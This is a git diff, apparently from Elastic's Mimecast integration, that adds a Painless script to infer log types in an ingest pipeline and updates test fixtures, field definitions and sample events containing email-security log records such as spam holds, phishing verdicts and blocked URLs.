"{\"Act\":\"Acc\",\"AttCnt\":0,\"AttNames\":\"\",\"AttSize\":0,\"MsgId\":\"messageId@mssageId\",\"MsgSize\":2116,\"aCode\":\"BY81J52RPjSmp7MrubnlZg\",\"acc\":\"C0A0\",\"datetime\":\"2017-05-26T19:36:48+0100\"}", + "outcome": "unknown" + }, + "mimecast": { + "AttCnt": 0, + "MsgSize": 2116, + "acc": "C0A0", + "log_type": "process" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2017-05-26T18:24:18.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "attachments": { + "file": { + "size": 0 + } + }, + "local_id": "015vTYvNN-Wn30v7M5MzNw", + "message_id": "messageId@mssageId" + }, + "event": { + "action": "Hld", + "created": "2017-05-26T19:24:18+0100", + "original": "{\"Act\":\"Hld\",\"AttCnt\":0,\"AttNames\":\"\",\"AttSize\":0,\"Hld\":\"Spm\",\"IPInternalName\":\"false\",\"IPNewDomain\":\"false\",\"IPReplyMismatch\":\"false\",\"IPSimilarDomain\":\"false\",\"IPThreadDict\":\"false\",\"MsgId\":\"messageId@mssageId\",\"MsgSize\":56442,\"aCode\":\"015vTYvNN-Wn30v7M5MzNw\",\"acc\":\"C0A0\",\"datetime\":\"2017-05-26T19:24:18+0100\"}", + "outcome": "unknown", + "reason": "Spm" + }, + "mimecast": { + "AttCnt": 0, + "IPInternalName": "false", + "IPNewDomain": "false", + "IPReplyMismatch": "false", + "IPSimilarDomain": "false", + "IPThreadDict": "false", + "MsgSize": 56442, + "acc": "C0A0", + "log_type": "process" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2017-05-26T18:40:33.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "attachments": { + "file": { + "size": 0 + } + }, + "direction": "inbound", + "from": { + "address": [ + "from@domain.com" + ] + }, + "local_id": "9q_HeIHHPYejZTBsnipWmQ", + "message_id": "messageId@mssageId", + "subject": "Auto Reply", + "to": { + "address": [ + "auser@mimecast.com" + ] + } + }, + "event": { + "created": "2017-05-26T19:40:33+0100", + "original": "{\"AttCnt\":0,\"AttSize\":0,\"Attempt\":1,\"Cphr\":\"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\",\"Delivered\":true,\"Dir\":\"Inbound\",\"IP\":\"81.2.69.144\",\"Latency\":5618,\"MsgId\":\"messageId@mssageId\",\"Rcpt\":\"auser@mimecast.com\",\"ReceiptAck\":\"250 2.6.0 messageId@mssageId [InternalId=25473608] Queued mail for delivery\",\"Route\":\"Mimecast Exchange Rout\",\"Sender\":\"from@domain.com\",\"Snt\":28237,\"Subject\":\"Auto Reply\",\"TlsVer\":\"TLSv1\",\"UseTls\":\"Yes\",\"aCode\":\"9q_HeIHHPYejZTBsnipWmQ\",\"acc\":\"C0A0\",\"datetime\":\"2017-05-26T19:40:33+0100\"}", + "outcome": "success" + }, + "mimecast": { + "AttCnt": 0, + "Attempt": 1, + "Latency": 5618, + "ReceiptAck": "250 2.6.0 messageId@mssageId [InternalId=25473608] Queued mail for delivery", + "Route": "Mimecast Exchange Rout", + "Snt": 28237, + "acc": "C0A0", + "log_type": "delivery" + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "tls": { + "cipher": "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA", + "established": true, + "version": "TLSv1" + } + }, + { + "@timestamp": "2021-03-05T16:25:17.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "attachments": { + "file": { + "extension": "xlsm", + "hash": { + "md5": "4dbe9dbfb53438d9ce410535355cd973", + "sha1": "816b013c8be6e5708690645964b5d442c085041e", + "sha256": "efe51c2453821310c7a34dca3054021d0f6d453b7133c381d75e3140901efd12" + }, + "mime_type": "application/vnd.ms-excel.sheet.macroEnabled.12", + "name": "Invoice Attached for payment", + "size": 1648832 + } + }, + "from": { + "address": [ + "8jy0xzfjymioyjfjrajc@senderdomain.tld" + ] + }, + "message_id": "<85485.121030516250700527@mta.uk.somewhere.tld>", + "subject": "Invoice Attached for payment", + "to": { + "address": [ + "recipient@recipientdomain.tld" + ] + } + }, + "event": { + "created": "2021-03-05T16:25:17+0000", + "original": "{\"CustomerIP\":\"true\",\"IP\":\"0.0.0.0\",\"MimecastIP\":\"false\",\"MsgId\":\"<85485.121030516250700527@mta.uk.somewhere.tld>\",\"Recipient\":\"recipient@recipientdomain.tld\",\"Route\":\"Inbound\",\"Sender\":\"8jy0xzfjymioyjfjrajc@senderdomain.tld\",\"SenderDomain\":\"senderdomain.tld\",\"SenderDomainInternal\":\"false\",\"Size\":1648832,\"Subject\":\"Invoice Attached for payment\",\"Virus\":\"Anomali:Phishing\",\"acc\":\"C0A0\",\"datetime\":\"2021-03-05T16:25:17+0000\",\"fileExt\":\"xlsm\",\"fileMime\":\"application/vnd.ms-excel.sheet.macroEnabled.12\",\"fileName\":\"Invoice Attached for payment\",\"md5\":\"4dbe9dbfb53438d9ce410535355cd973\",\"sha1\":\"816b013c8be6e5708690645964b5d442c085041e\",\"sha256\":\"efe51c2453821310c7a34dca3054021d0f6d453b7133c381d75e3140901efd12\"}", + "outcome": "unknown" + }, + "mimecast": { + "CustomerIP": "true", + "MimecastIP": "false", + "Recipient": "recipient@recipientdomain.tld", + "Route": "Inbound", + "SenderDomainInternal": "false", + "Virus": "Anomali:Phishing", + "acc": "C0A0", + "log_type": "avlog" + }, + "source": { + "domain": "senderdomain.tld", + "ip": "0.0.0.0" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-03-05T18:18:39.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "from": { + "address": [ + "sender@adomain", + "sender@domain.tld" + ] + }, + "local_id": "azYwczFKNga_v1sYBuJOvA", + "message_id": "", + "subject": "Opportunity to become VP", + "to": { + "address": [ + "recipient@adomain.tld" + ] + } + }, + "event": { + "created": "2021-03-05T18:18:39+0000", + "original": "{\"MsgId\":\"\",\"Recipient\":\"recipient@adomain.tld\",\"Route\":\"Inbound\",\"Sender\":\"sender@domain.tld\",\"SenderDomain\":\"bdomain.tld\",\"SourceIP\":\"0.0.0.0\",\"Subject\":\"Opportunity to become VP\",\"aCode\":\"azYwczFKNga_v1sYBuJOvA\",\"acc\":\"C0A0\",\"datetime\":\"2021-03-05T18:18:39+0000\",\"headerFrom\":\"sender@adomain\"}", + "outcome": "unknown" + }, + "mimecast": { + "Recipient": "recipient@adomain.tld", + "Route": "Inbound", + "acc": "C0A0", + "log_type": "spam" + }, + "source": { + "domain": "bdomain.tld", + "ip": "0.0.0.0" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-03-04T21:31:08.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "from": { + "address": [ + "sender@domain.tld" + ] + }, + "local_id": "vit87EEXMPaEyl22Lrb92A", + "message_id": "", + "subject": "Coffee Briefing", + "to": { + "address": [ + "recipient@domain.tld" + ] + } + }, + "event": { + "created": "2021-03-04T21:31:08+0000", + "original": "{\"MsgId\":\"\",\"Recipient\":\"recipient@domain.tld\",\"Route\":\"Internal\",\"ScanResultInfo\":\"Blocked URL Category\",\"Sender\":\"sender@domain.tld\",\"Subject\":\"Coffee Briefing\",\"URL\":\"https://domain.com/login/\",\"UrlCategory\":\"Phishing & Fraud\",\"aCode\":\"vit87EEXMPaEyl22Lrb92A\",\"acc\":\"C46A75\",\"datetime\":\"2021-03-04T21:31:08+0000\"}", + "outcome": "unknown" + }, + "mimecast": { + "Recipient": "recipient@domain.tld", + "Route": "Internal", + "ScanResultInfo": "Blocked URL Category", + "UrlCategory": "Phishing & Fraud", + "acc": "C46A75", + "log_type": "internal-email-protect" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "full": "https://domain.com/login/" + } + }, + { + "@timestamp": "2020-07-26T23:39:59.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "from": { + "address": [ + "sender@domain" + ] + }, + "local_id": "q4qBpkoTOt-iStR7G44w3g", + "message_id": "", + "subject": "Opportunity to become VP", + "to": { + "address": [ + "recipient@domain" + ] + } + }, + "event": { + "action": "Hold", + "created": "2020-07-27T00:39:59+0100", + "original": "{\"Action\":\"Hold\",\"CustomName\":\"false\",\"CustomThreatDictionary\":\"false\",\"Definition\":\"Default Impersonation Definition\",\"Hits\":\"1\",\"IP\":\"0.0.0.0\",\"InternalName\":\"true\",\"MsgId\":\"\",\"NewDomain\":\"false\",\"Recipient\":\"recipient@domain\",\"ReplyMismatch\":\"false\",\"Route\":\"Inbound\",\"Sender\":\"sender@domain\",\"SimilarCustomExternalDomain\":\"false\",\"SimilarInternalDomain\":\"false\",\"SimilarMimecastExternalDomain\":\"false\",\"Subject\":\"Opportunity to become VP\",\"TaggedExternal\":\"false\",\"TaggedMalicious\":\"true\",\"ThreatDictionary\":\"false\",\"aCode\":\"q4qBpkoTOt-iStR7G44w3g\",\"acc\":\"C0A0\",\"datetime\":\"2020-07-27T00:39:59+0100\"}", + "outcome": "unknown" + }, + "mimecast": { + "CustomName": "false", + "CustomThreatDictionary": "false", + "Hits": "1", + "InternalName": "true", + "Recipient": "recipient@domain", + "ReplyMismatch": "false", + "Route": "Inbound", + "SimilarCustomExternalDomain": "false", + "SimilarInternalDomain": "false", + "SimilarMimecastExternalDomain": "false", + "TaggedExternal": "false", + "TaggedMalicious": "true", + "ThreatDictionary": "false", + "acc": "C0A0", + "log_type": "impersonation-protect" + }, + "rule": { + "name": "Default Impersonation Definition" + }, + "source": { + "domain": "false", + "ip": "0.0.0.0" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2017-05-26T18:22:37.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "from@domain.com" + ] + }, + "to": { + "address": [ + "auser@mimecast.com" + ] + } + }, + "event": { + "created": "2017-05-26T19:22:37+0100", + "original": "{\"acc\":\"C0A0\",\"datetime\":\"2017-05-26T19:22:37+0100\",\"reason\":\"malicious\",\"recipient\":\"auser@mimecast.com\",\"route\":\"inbound\",\"sender\":\"from@domain.com\",\"senderDomain\":\"domain.com\",\"sourceIp\":\"81.2.69.144\",\"url\":\"http://bgmtechnology.com.au\",\"urlCategory\":\"Blocked\"}", + "outcome": "unknown", + "reason": "malicious" + }, + "mimecast": { + "acc": "C0A0", + "log_type": "url-protect", + "urlCategory": "Blocked" + }, + "source": { + "domain": "domain.com", + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "full": "http://bgmtechnology.com.au" + } + }, + { + "@timestamp": "2017-05-23T20:45:21.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "attachments": { + "file": { + "extension": "doc", + "hash": { + "md5": "7b52770644da336a9a59141c80807f37", + "sha1": "a27850da9e7adfc8e1a94dabf2509fc9d65ee7e2", + "sha256": "8746bb4b31ab6f03eb0a3b2c62ab7497658f0f85c8e7e82f042f9af0bb876d83" + }, + "mime_type": "application/vnd.ms-office", + "name": "1XCOLUMN.PVC", + "size": 378368 + } + }, + "from": { + "address": [ + "from@domain.com" + ] + }, + "to": { + "address": [ + "auser@mimecast.com" + ] + } + }, + "event": { + "created": "2017-05-23T21:45:21+0100", + "original": "{\"IP\":\"81.2.69.144\",\"Recipient\":\"auser@mimecast.com\",\"Route\":\"Inbound\",\"Sender\":\"from@domain.com\",\"SenderDomain\":\"domain.com\",\"Size\":378368,\"acc\":\"C1A1\",\"datetime\":\"2017-05-23T21:45:21+0100\",\"fileExt\":\"doc\",\"fileMime\":\"application/vnd.ms-office\",\"fileName\":\"1XCOLUMN.PVC\",\"md5\":\"7b52770644da336a9a59141c80807f37\",\"sha1\":\"a27850da9e7adfc8e1a94dabf2509fc9d65ee7e2\",\"sha256\":\"8746bb4b31ab6f03eb0a3b2c62ab7497658f0f85c8e7e82f042f9af0bb876d83\"}", + "outcome": "unknown" + }, + "mimecast": { + "Recipient": "auser@mimecast.com", + "Route": "Inbound", + "acc": "C1A1", + "log_type": "attachment-protect" + }, + "source": { + "domain": "domain.com", + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file diff --git a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json index c64dd64c205..004bfec9880 100644 --- a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json +++ b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json @@ -382,7 +382,7 @@ }, "mimecast": { "acc": "C46A75", - "log_type": "ttp_url", + "log_type": "url-protect", "urlCategory": "Phishing & Fraud" }, "source": { @@ -455,7 +455,7 @@ }, "SpamScore": 1, "acc": "MRK435457623", - "log_type": "a7bebfbb-f4fd-4247-912e-820ace186108" + "log_type": "receipt" }, "source": { "as": { diff --git a/packages/mimecast/data_stream/siem_logs/elasticsearch/ingest_pipeline/default.yml b/packages/mimecast/data_stream/siem_logs/elasticsearch/ingest_pipeline/default.yml index 60115cbf55e..385b312279e 100644 --- a/packages/mimecast/data_stream/siem_logs/elasticsearch/ingest_pipeline/default.yml +++ b/packages/mimecast/data_stream/siem_logs/elasticsearch/ingest_pipeline/default.yml @@ -16,12 +16,6 @@ processors: target_field: mimecast - drop: if: ctx?.mimecast?.datetime == null - - fingerprint: - fields: - - mimecast.MsgId - - mimecast.datetime - target_field: "_id" - ignore_missing: true - date: description: Use 'mimecast.datetime' as the '@timestamp' @@ -30,6 +24,189 @@ processors: formats: - yyyy-MM-dd'T'HH:mm:ssZ + ### NOTE LOG TYPE + - script: + lang: painless + params: + definite_positive: + action: receipt + attempt: delivery + attnames: process + customerip: avlog + customname: impersonation-protect + customthreatdictionary: impersonation-protect + definition: impersonation-protect + delivered: delivery + err: delivery + error: receipt + filename: attachment-protect + hits: impersonation-protect + hld: process + internalname: impersonation-protect + ipinternalname: process + ipnewdomain: process + ipreplymismatch: process + ipsimilardomain: process + ipthreaddict: process + latency: delivery + mimecastip: avlog + msgsize: process + newdomain: impersonation-protect + reason: url-protect + receiptack: delivery + replymismatch: impersonation-protect + rcptacttype: jrnl + scanresultinfo: internal-email-protect + senderdomaininternal: avlog + similarcustomexternaldomain: impersonation-protect + similarinternaldomain: impersonation-protect + similarmimecastexternaldomain: impersonation-protect + snt: delivery + spaminfo: receipt + spamlimit: receipt + spamprocessingdetail: receipt + spamscore: receipt + taggedexternal: impersonation-protect + taggedmalicious: impersonation-protect + threatdictionary: impersonation-protect + usetls: delivery + negative: + acode: [avlog, url-protect, attachment-protect] + act: [delivery, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl] + attcnt: [receipt, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl] + attsize: [receipt, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl] + cphr: [process,avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl] + dir: [process, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect] + fileext: [receipt, process, delivery, spam, internal-email-protect, impersonation-protect, url-protect, jrnl] + filemime: [receipt, process, delivery, spam, internal-email-protect, impersonation-protect, url-protect, jrnl] + headerfrom: [process, delivery, avlog, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl] + ip: [process, spam, internal-email-protect, url-protect, jrnl] + md5: [receipt, process, delivery, spam, internal-email-protect, impersonation-protect, url-protect, jrnl] + rcpt: [process, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect] + recipient: [receipt, process, delivery, jrnl] + rejcode: [process, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl] + rejinfo: [process, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl] + rejtype: [process, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl] + route: [receipt, process, jrnl] + senderdomain: [receipt, process, delivery, internal-email-protect, impersonation-protect, jrnl] + sha1: [receipt, process, delivery, spam, internal-email-protect, impersonation-protect, url-protect, jrnl] + sha256: [receipt, process, delivery, spam, internal-email-protect, impersonation-protect, url-protect, jrnl] + size: [receipt, process, delivery, spam, internal-email-protect, impersonation-protect, url-protect, jrnl] + sourceip: [receipt, process, delivery, avlog, internal-email-protect, impersonation-protect, attachment-protect, jrnl] + tlsver: [process, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl] + url: [receipt, process, delivery, avlog, spam, impersonation-protect, attachment-protect, jrnl] + urlcategory: [receipt, process, delivery, avlog, spam, impersonation-protect, attachment-protect, jrnl] + virus: [process, delivery, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect, jrnl] + positive: + acode: [receipt, process, delivery, spam, internal-email-protect, impersonation-protect, jrnl] + act: [receipt, process] + attcnt: [process, delivery] + attsize: [process, delivery] + cphr: [receipt, delivery] + dir: [receipt, delivery, jrnl] + fileext: [avlog, attachment-protect] + filemime: [avlog, attachment-protect] + headerfrom: [receipt, spam] + ip: [receipt, delivery, avlog, impersonation-protect, attachment-protect] + md5: [avlog, attachment-protect] + rcpt: [receipt, delivery, jrnl] + recipient: [avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect] + rejcode: [receipt, delivery] + rejinfo: [receipt, delivery] + rejtype: [receipt, delivery] + route: [delivery, avlog, spam, internal-email-protect, impersonation-protect, url-protect, attachment-protect] + senderdomain: [avlog, spam, url-protect, attachment-protect] + sha1: [avlog, attachment-protect] + sha256: [avlog, attachment-protect] + size: [avlog, attachment-protect] + sourceip: [spam, url-protect] + tlsver: [receipt, delivery] + url: [internal-email-protect, url-protect] + urlcategory: [internal-email-protect, url-protect] + virus: [receipt, avlog] + candidates: + receipt: 0 + process: 0 + delivery: 0 + jrnl: 0 + avlog: 0 + spam: 0 + internal-email-protect: 0 + impersonation-protect: 0 + url-protect: 0 + attachment-protect: 0 + if: ctx.mimecast instanceof Map + source: | + // Canonicalise keys to lowercase. If this causes issues in future + // because case becomes significant, this table space optimisation + // will need to be reverted. + def keys = new HashSet(); + for (def k: ctx.mimecast.keySet()) { + keys.add(k.toLowerCase()); + } + for (def k: keys) { + def typ = params.definite_positive.get(k); + if (typ != null) { + // We have a definitive known log_type. + ctx.mimecast.log_type = typ; + return; + } + } + def score = params.candidates.clone(); + for (def k: keys) { + def typ = params.negative.get(k); + if (typ == null) { + continue; + } + for (String e: typ) { + score.remove(e); + } + } + if (score.size() == 1) { + // We have removed all but one of the candidates. + ctx.mimecast.log_type = score.keySet().toArray()[0]; + return; + } + // Find best remaining and list all co-equal winners. + int max = 0; + for (def k: keys) { + def typ = params.positive.get(k); + if (typ == null) { + continue; + } + for (String e: typ) { + def s = score.get(e); + if (s == null) { + continue; + } + s++; + if (s > max) { + max = s; + } + score.put(e, s); + } + } + for (def e: score.entrySet()) { + if (e.getValue() < max) { + score.remove(e.getKey()); + } + } + ctx.mimecast.log_type = score.keySet(); + + - fingerprint: + fields: + - mimecast.MsgId + - mimecast.aCode + - mimecast.datetime + - mimecast.Sender + - mimecast.Rcpt + - mimecast.Attempt + - mimecast.log_type + - mimecast.sha256 + - mimecast.url + target_field: "_id" + ignore_missing: true + ### RECEIPT LOGS - rename: field: mimecast.aCode @@ -94,6 +271,7 @@ processors: field: mimecast.TlsVer target_field: tls.version ignore_missing: true + ### PROCESS LOGS - rename: field: mimecast.AttSize @@ -107,7 +285,8 @@ processors: field: mimecast.Hld target_field: event.reason ignore_missing: true - ### DELIVERY LOGS + + ### DELIVERY LOGS - rename: field: mimecast.Err target_field: error.message @@ -124,7 +303,8 @@ processors: field: tls.established value: false if: 'ctx.tls?.established instanceof String && ctx.tls.established.toLowerCase() == "no"' - ### AV LOGS + + ### AV LOGS - rename: field: mimecast.fileExt target_field: email.attachments.file.extension @@ -162,17 +342,20 @@ processors: field: mimecast.fileName target_field: email.attachments.file.name ignore_missing: true - ### SPAM EVENT THREAD LOGS + + ### SPAM EVENT THREAD LOGS - rename: field: mimecast.SourceIP target_field: source.ip ignore_missing: true - ### SIEM Email Protect Logs + + ### SIEM Email Protect Logs - rename: field: mimecast.URL target_field: url.full ignore_missing: true - ### SIEM Impersonation logs + + ### SIEM Impersonation logs - rename: field: mimecast.Action target_field: event.action @@ -185,7 +368,8 @@ processors: field: mimecast.NewDomain target_field: source.domain ignore_missing: true - ### SIEM TTP Url Logs + + ### SIEM TTP Url Logs - rename: field: mimecast.reason target_field: event.reason @@ -224,33 +408,6 @@ processors: field: mimecast.action target_field: event.action ignore_missing: true - - dissect: - field: mimecast.Content-Disposition - pattern: "%{?drop->}=\"%{mimecast.log_type}.%{?drop->}" - ignore_missing: true - - split: - field: mimecast.log_type - separator: "_" - target_field: mimecast.log_type_parts - if: 'ctx?.mimecast?.log_type != null' - - set: - field: mimecast.log_type_part1 - copy_from: mimecast.log_type_parts.0 - if: 'ctx?.mimecast?.log_type_parts instanceof List && ctx.mimecast.log_type_parts.size() > 0' - - set: - field: mimecast.log_type_part2 - copy_from: mimecast.log_type_parts.1 - if: 'ctx?.mimecast?.log_type_parts instanceof List && ctx.mimecast.log_type_parts.size() > 1' - - set: - field: mimecast.log_type - value: "{{mimecast.log_type_part1}}" - if: 'ctx?.mimecast?.log_type_part1 != "ttp"' - ignore_failure: true - - set: - field: mimecast.log_type - value: "{{mimecast.log_type_part1}}_{{mimecast.log_type_part2}}" - if: 'ctx?.mimecast?.log_type_part1 =="ttp" && ctx?.mimecast?.log_type_part2 != null' - ignore_failure: true - set: field: event.created value: "{{mimecast.datetime}}" @@ -270,15 +427,15 @@ processors: - set: field: event.outcome value: "success" - if: 'ctx?.event?.outcome ==true' + if: ctx?.event?.outcome == true - set: field: event.outcome value: "failure" - if: 'ctx?.event?.outcome ==false' + if: ctx?.event?.outcome == false - set: field: event.outcome value: "unknown" - if: 'ctx?.event?.outcome ==null' + if: ctx?.event?.outcome == null - lowercase: field: email.direction ignore_missing: true @@ -349,7 +506,6 @@ processors: field: event.original if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" ignore_failure: true - ### # Error handling on_failure: diff --git a/packages/mimecast/data_stream/siem_logs/fields/field.yml b/packages/mimecast/data_stream/siem_logs/fields/field.yml index acd94e5297d..f1df23f755f 100644 --- a/packages/mimecast/data_stream/siem_logs/fields/field.yml +++ b/packages/mimecast/data_stream/siem_logs/fields/field.yml @@ -73,10 +73,13 @@ description: The source IP is one of the accounts authorised IPs or one of the authorised IPs belonging to an Umbrella Account, if the Account uses an Umbrella Account. - name: MimecastIP type: keyword - description: The source IP is one of the Mimecast' IPs e.g. Mimecast Personal Portal. + description: The source IP is one of the Mimecast' IPs e.g. Mimecast Personal Portal. - name: SenderDomainInternal type: keyword description: The sender domain is a registered internal domain. + - name: Recipient + type: keyword + description: The recipient of the original message. ### Spam Event Thread Logs - name: ScanResultInfo type: keyword diff --git a/packages/mimecast/data_stream/siem_logs/sample_event.json b/packages/mimecast/data_stream/siem_logs/sample_event.json index f0664684e4c..f9c42d2e049 100644 --- a/packages/mimecast/data_stream/siem_logs/sample_event.json +++ b/packages/mimecast/data_stream/siem_logs/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2021-11-12T12:15:46.000Z", "agent": { - "ephemeral_id": "c6e5221f-b305-4a75-acb4-7a43547a1e6d", - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "ephemeral_id": "9e414d8d-fe0d-4db1-a95f-aed984c0eef9", + "id": "a26821e0-e36a-4513-a137-0df112893aba", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.12.1" }, "data_stream": { "dataset": "mimecast.siem_logs", @@ -16,9 +16,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "id": "a26821e0-e36a-4513-a137-0df112893aba", "snapshot": false, - "version": "8.9.0" + "version": "8.12.1" }, "email": { "direction": "internal", @@ -38,7 +38,7 @@ "agent_id_status": "verified", "created": "2021-11-12T12:15:46+0000", "dataset": "mimecast.siem_logs", - "ingested": "2023-07-27T14:59:24Z", + "ingested": "2024-04-07T21:50:35Z", "original": "{\"Content-Disposition\":\"attachment; filename=\\\"jrnl_20211018093329655.json\\\"\",\"Dir\":\"Internal\",\"Rcpt\":\"o365_service_account@example.com\",\"RcptActType\":\"Jnl\",\"RcptHdrType\":\"Unknown\",\"Sender\":\"johndoe@example.com\",\"aCode\":\"fjihpfEgM_iRwemxhe3t_w\",\"acc\":\"ABC123\",\"datetime\":\"2021-11-12T12:15:46+0000\"}", "outcome": "unknown" }, @@ -56,4 +56,4 @@ "forwarded", "mimecast-siem-logs" ] -} +} \ No newline at end of file diff --git a/packages/mimecast/data_stream/threat_intel_malware_customer/sample_event.json b/packages/mimecast/data_stream/threat_intel_malware_customer/sample_event.json index e07292f5b1e..a4bc0bc1e75 100644 --- a/packages/mimecast/data_stream/threat_intel_malware_customer/sample_event.json +++ b/packages/mimecast/data_stream/threat_intel_malware_customer/sample_event.json @@ -68,4 +68,4 @@ "type": "file" } } -} +} \ No newline at end of file diff --git a/packages/mimecast/data_stream/threat_intel_malware_grid/sample_event.json b/packages/mimecast/data_stream/threat_intel_malware_grid/sample_event.json index 4936ab332e8..f630ce7ac4d 100644 --- a/packages/mimecast/data_stream/threat_intel_malware_grid/sample_event.json +++ b/packages/mimecast/data_stream/threat_intel_malware_grid/sample_event.json @@ -68,4 +68,4 @@ "type": "file" } } -} +} \ No newline at end of file diff --git a/packages/mimecast/data_stream/ttp_ap_logs/sample_event.json b/packages/mimecast/data_stream/ttp_ap_logs/sample_event.json index bdd387dd722..3aaa8994cf6 100644 --- a/packages/mimecast/data_stream/ttp_ap_logs/sample_event.json +++ b/packages/mimecast/data_stream/ttp_ap_logs/sample_event.json @@ -73,4 +73,4 @@ "forwarded", "mimecast-ttp-ap" ] -} +} \ No newline at end of file diff --git a/packages/mimecast/data_stream/ttp_ip_logs/sample_event.json b/packages/mimecast/data_stream/ttp_ip_logs/sample_event.json index 4aa21c40477..8712f01e6bd 100644 --- a/packages/mimecast/data_stream/ttp_ip_logs/sample_event.json +++ b/packages/mimecast/data_stream/ttp_ip_logs/sample_event.json @@ -78,4 +78,4 @@ "forwarded", "mimecast-ttp-ip" ] -} +} \ No newline at end of file diff --git a/packages/mimecast/data_stream/ttp_url_logs/sample_event.json b/packages/mimecast/data_stream/ttp_url_logs/sample_event.json index 6818316186b..72a0159f3f7 100644 --- a/packages/mimecast/data_stream/ttp_url_logs/sample_event.json +++ b/packages/mimecast/data_stream/ttp_url_logs/sample_event.json @@ -85,4 +85,4 @@ "johndoe@example.com" ] } -} +} \ No newline at end of file diff --git a/packages/mimecast/docs/README.md b/packages/mimecast/docs/README.md index 99d6ed8d6fd..00dcd52b0c5 100644 --- a/packages/mimecast/docs/README.md +++ b/packages/mimecast/docs/README.md @@ -28,11 +28,11 @@ An example event for `archive_search` looks as following: { "@timestamp": "2021-03-18T18:35:49.000Z", "agent": { - "ephemeral_id": "ef42d9ea-67ec-4494-bad4-9d47b9ed68d2", - "id": "f81bb806-77be-4e89-9f08-d426b37fd611", + "ephemeral_id": "33b422bb-ff57-4039-80c8-23c64e5f54d7", + "id": "5e5700e6-bb04-40f9-b6fc-e5adb94ec6b5", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.8.2" + "version": "8.12.1" }, "data_stream": { "dataset": "mimecast.archive_search_logs", @@ -87,7 +87,6 @@ An example event for `archive_search` looks as following: "name": "admin_dhamilton" } } - ``` **Exported fields** @@ -217,7 +216,6 @@ An example event for `audit_events` looks as following: "name": "johndoe" } } - ``` **Exported fields** @@ -372,7 +370,6 @@ An example event for `dlp` looks as following: "mimecast-dlp-logs" ] } - ``` **Exported fields** @@ -444,11 +441,11 @@ An example event for `siem` looks as following: { "@timestamp": "2021-11-12T12:15:46.000Z", "agent": { - "ephemeral_id": "c6e5221f-b305-4a75-acb4-7a43547a1e6d", - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "ephemeral_id": "9e414d8d-fe0d-4db1-a95f-aed984c0eef9", + "id": "a26821e0-e36a-4513-a137-0df112893aba", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.12.1" }, "data_stream": { "dataset": "mimecast.siem_logs", @@ -459,9 +456,9 @@ An example event for `siem` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "id": "a26821e0-e36a-4513-a137-0df112893aba", "snapshot": false, - "version": "8.9.0" + "version": "8.12.1" }, "email": { "direction": "internal", @@ -481,7 +478,7 @@ An example event for `siem` looks as following: "agent_id_status": "verified", "created": "2021-11-12T12:15:46+0000", "dataset": "mimecast.siem_logs", - "ingested": "2023-07-27T14:59:24Z", + "ingested": "2024-04-07T21:50:35Z", "original": "{\"Content-Disposition\":\"attachment; 